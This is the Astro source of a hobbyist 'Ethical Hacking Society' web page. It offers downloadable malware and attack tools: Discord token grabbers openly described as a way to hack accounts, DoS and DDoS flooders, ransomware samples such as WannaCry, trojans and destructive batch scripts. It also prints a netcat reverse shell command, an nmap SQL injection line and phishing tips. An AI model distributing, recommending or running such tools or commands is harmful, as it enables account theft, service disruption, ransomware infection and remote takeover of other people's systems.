---
import Head      from '../../layouts/Head.astro';
import Scripts from '../../layouts/Scripts.astro';
import Hero      from '../../components/Hero.astro';
import Navbar    from '../../components/Navbar.astro';
import Footer    from '../../components/Footer.astro';
import Scrollspy from '../../components/Scrollspy.astro';
import Accordion from '../../components/accordion/Accordion.astro';
import AccordionItem from '../../components/accordion/AccordionItem.astro';
import BackToTop from '../../components/BackToTop.astro';
---

<Head title="Ethical Hacking Society" heroid="ehs" description="The Ethical Hacking Society is about ethical hacking as a whole." keyword="scripts, viruses, coding," author="Alex Toucan & CobraCommander" />
      <div id="page">
<Navbar />
      <div class="alert alert-dark mb-0" role="alert">
        This is an inactive community. Expect no new sections or changes without special exceptions.
      </div>
        <Hero id="ehs" title="Ethical Hacking Society" description="The Ethical Hacking Society is about ethical hacking as a whole." primaryHref="https://discord.gg/yCnteHexEs" primaryText="Discord Server Invite" secondaryHref="/ehs" secondaryText="View the pop-up format"
icons={[
    { icon: "discord", desc: "Discord Server Invite", href: "https://discord.gg/pgGfhDVrmS" },
    { icon: "discord", desc: "Anti Vegans", href: "https://discord.gg/yCnteHexEs" },
  ]},
dropdownItems = {[
{ navigationDesc: "Slammer", navigationLink: "#slammer" },
{ navigationDesc: "Denial Of Service", navigationLink: "#dos" },
{ navigationDesc: "Distributed Denial Of Service", navigationLink: "#ddos" },
{ navigationDesc: "Token Grabbers", navigationLink: "#token" },
{ navigationDesc: "Ransomware", navigationLink: "#ransom" },
{ navigationDesc: "Trojans", navigationLink: "#trojans" },
{ navigationDesc: "Worms", navigationLink: "#worms" },
{ navigationDesc: "Other", navigationLink: "#other" },
]}
/>
<main id="ehs" class="container">
    <div id="disclaimer">
      <h2> Disclaimer </h2>
      <p> We do not take responsibility for any damage, or legal issues, done with these files here at AT Products LLC, Ethical Hacking Society, The Script Community, CodingHome, or Noodle Hackerspace.      <br><br>
   Use a virtual machine if it's a computer virus; never open it on your physical machine. As a precaution, download them on your VM.<br><br>If it's an APK file, use an emulator.<br><br><a href="https://www.vmware.com/topics/glossary/content/virtual-machine" target="_blank" rel="noopener noreferrer">More information on Virtual Machines (VM) </a><br><a href="https://developer.android.com/studio/run/emulator" target="_blank" rel="noopener noreferrer">More information on APK Emulators</a></p></div>
<hr> 
<div id="slammer">
<h2> Slammer </h2>
 <p> <a href="/media/files/Slammer_.py" download="">Slammer (Python)</a> 
     <a href="/media/files/Slammer_socks.py" download="">Slammer Socks (Python)</a> 
     <a href="/media/files/Slammer_terminal.py" download="">Slammer Terminal (Python)</a> by CobraCommander. </p>
</div>
<hr>
<div id="dos">
 <h2> Denial of Service </h2>
 <div class="my-3">
 <a href="/backup/script#dos" class="btn btn-info mb-1">TSC's DoS Section</a>
</div>
<br>
<p> A denial-of-service (DoS) attack is a type of cyber attack in which a malicious actor aims to render a computer or other device unavailable to its intended users by interrupting the device's normal functioning. DoS attacks typically function by overwhelming or flooding a targeted machine with requests until normal traffic is unable to be processed, resulting in denial-of-service to addition users. A DoS attack is characterized by using a single computer to launch the attack.</p> 
 <p> <a href="/media/files/http.py" download="">HTTP Flooder (Python)</a> by Nasus</p>
 <p> <a href="/media/files/requirements.txt" download="">Requirements (TXT)</a> 
     <a href="/media/files/MHViP.py" download="">MHViP (Python)</a> 
     <a href="/media/files/README.md" download="">README (MD)</a>. These files are a private paid DDPS</p>
</div>
<hr>
<div id="ddos">
<h2> Distributed Denial of Service </h2> 
 <p> A distributed denial-of-service (DDoS) attack is a type of DoS attack that comes from many distributed sources, such as a botnet DDoS attack. </p> 
<p> <a href="/media/files/SaphyraDDOS.py" download="">SaphryaDDOS (Python)</a> <a href="/media/files/Ping_of_death_.py" download="">Ping of Death (Python)</a> <a href="/media/files/UDP_Flood.py" download="">UDP Flood (Python)</a> by CobraCommander</p>
</div>
<hr>
<div id="token">
<h2> Token Grabbers </h2>
         <p> A Token Grabber is supposed to grab people on Discord's tokens, to hack their account. </p>
 <p> <a href="/media/files/token-grabber.py" download="">Token Grabber (Python)</a> by Alex Toucan</p>
 <p> <a href="/media/files/token.py" download="">Token Grabber (Python)</a> by wodxgod</p>
 <p> <a href="/media/files/tokengrab.py" download="">Token Grabber (Python)</a> by Wever </p>

 <p> <a href="/media/files/token.7z" download="">Token Grabber (7Z)</a> <a href="/media/files/Token_grabber4.py" download="">Token Grabber (Python)</a> by CobraCommander</p>
 <p> <a href="/media/files/tokencyb.js" download="">Token Grabber (JavaScript)</a> by CУБΞЯC </p>
 <p> <a href="/media/files/brutetoken.py" download="">Token Bruteforcer (Python)</a> by Social404</p>

 <h4> Wever Recommends these Steps </h4>
 <p><a href="https://github.com/ii7x/IMAGE-DISCORD-TOKEN-GRABBER-BY-II7X">Token Grabber.js</a>
   <a href="https://github.com/Nimplex/ss-grabber.js">ss-grabber.js</a>
   <a href="https://www.youtube.com/watch?v=T4XMLoBFWsI">Tutorial</a></p>
</div>
<hr> 
<div id="ransom">
<h2> Ransomware </h2>
 <p> <a href="/media/files/DCQPKX.exe" download="">DCQPKX (EXE)</a>
  <a href="/media/files/Wannacry.exe" download="">WannaCry (EXE)</a>
    <a href="/media/files/Wannacry2.exe" download="">WannaCry 2 (EXE)</a>
  <a href="/media/files/MYDOOM.idb" download="">MyDOOM (IDB)</a> 
  <a href="/media/files/grandcab.bin" download="">GrandCab (BIN)</a> 
   <a href="/media/files/unknown" download="">Unknown</a> 
   <a href="/media/files/windows8-rt.msu" download="">Windows 8 RT Virus (MSU)</a> 
   <a href="/media/files/mydoom.c" download="">MYDOOM (C)</a> <a href="media/files/RnVjayB5b3UgCg.bat" id="new">Infect Files (BAT)</a>
    <a href="/media/files/Ransomware.exe" download="">Homemade (EXE)</a> by CobraCommander </p>
 <p> <a href="https://github.com/Endermanch/MalwareDatabase">Collection</a> by Endermanch </p> 
   </div>
<hr>   
<div id="trojans">
<h2> Trojans </h2> 
 <p><b>From The Script Community:</b> A Trojan horse in cybersecurity is any malware that misleads users of its true intent. It may look legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general inflict some other harmful action on your data or network. </p>
   <p> <a href="/media/files/memz-trojan.zip" download="">MEMZ Trojan (ZIP | Python)</a>
     <a href="/media/files/trojan-antivirus.bat" download="">Trojan 1 (BAT)</a>
     <a href="/media/files/trojan.bat" download="">Trojan 2 (BAT)</a> 
     <a href="/media/files/Trojan_.bat" download="">Trojan 3 (BAT)</a>
      <a href="/media/files/Trojan_3.bat" download="">Trojan 4 (BAT)</a>
      <a href="/media/files/Trojan_2.bat" download="">Trojan 5 (BAT)</a>
      by CobraCommander</p>
</div>
<hr>  
<div id="worms">
<h2> Worms </h2>
   <p> <a href="/media/files//Networm.txt" download="">Networm (TXT)</a> by CobraCommander </p></div><hr> <div id="other">
<h3> Other </h3>
   <p><a href="/media/files/Doom.exe" download="">Doom (EXE)</a> <a href="Techno.bat">Techno (BAT)</a> <a href="/media/files/viruscodes.txt" download="">VirusCodes (TXT)</a> 
     <a href="/media/files/DoomB.bat" download="">Doom (BAT | Version 2)</a> 
     <a href="/media/files//unknown.bat" download="">Unknown (BAT)</a> 
     <a href="/media/files/death.bat" download="">Death (BAT)</a> 
     <a href="/media/files/crash.bat" download="">Crash (BAT)</a> 
     <a href="/media/files/unknown1.bat" download="">Unknown (BAT)</a> 
     <a href="/media/files/Matrix.txt" download="">Matrix (TXT)</a> 
     <a href="/media/files/Script.bat" download="">Script (BAT)</a> 
     <a href="/media/files/pingerandddos.zip" download="">Pinger and DDOS (RAR)</a> 
     <a href="/media/files/Mydoom_3" download="">MyDOOM_3</a> by CobraCommander</p>  
<p> <b>Reverse Shell Command on <a href="http://netcat.sourceforge.net/">Netcat</a></b> - 
   <code>nc -e /bin/sh 10.0.0.1 1234</code>
</p><p> <b><a href="https://nmap.org/">Nmap</a> on Kali Linux SQL Injection</b> - <code>nmap --script=http-sql-injection &lt;target&gt;</code>
</p><p> <b>Ping of Death in “C”</b> - <code>ping &lt;ip address&gt; -t |65500</code></p>
<p> <b> Social Engineering</b> - "Spearhead phishing is effective but try something like whaling or watering hole" <a href="https://www.wireshark.org/#download">Wireshark</a> is a network protocol analyzer used to capture traffic. <br> <br>Putting your adapter in Monitor mode, or RFMON mode, allows a computer with a wireless network interface controller to monitor all traffic received on a wireless channel. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with an access point<br> <br> Buy a WiFi Adapter that supports Monitor Mode.
 </p>
<p>
<a class="icon-link icon-link-hover" href="/backup/script#whpt">
See phishing definitions
<i class="bi bi-arrow-right h-100"></i>
</a>
</p>
            </div> 
</main>
        <Footer author="Alex Toucan & CobraCommander" />
<BackToTop />
</div>
<Scripts />
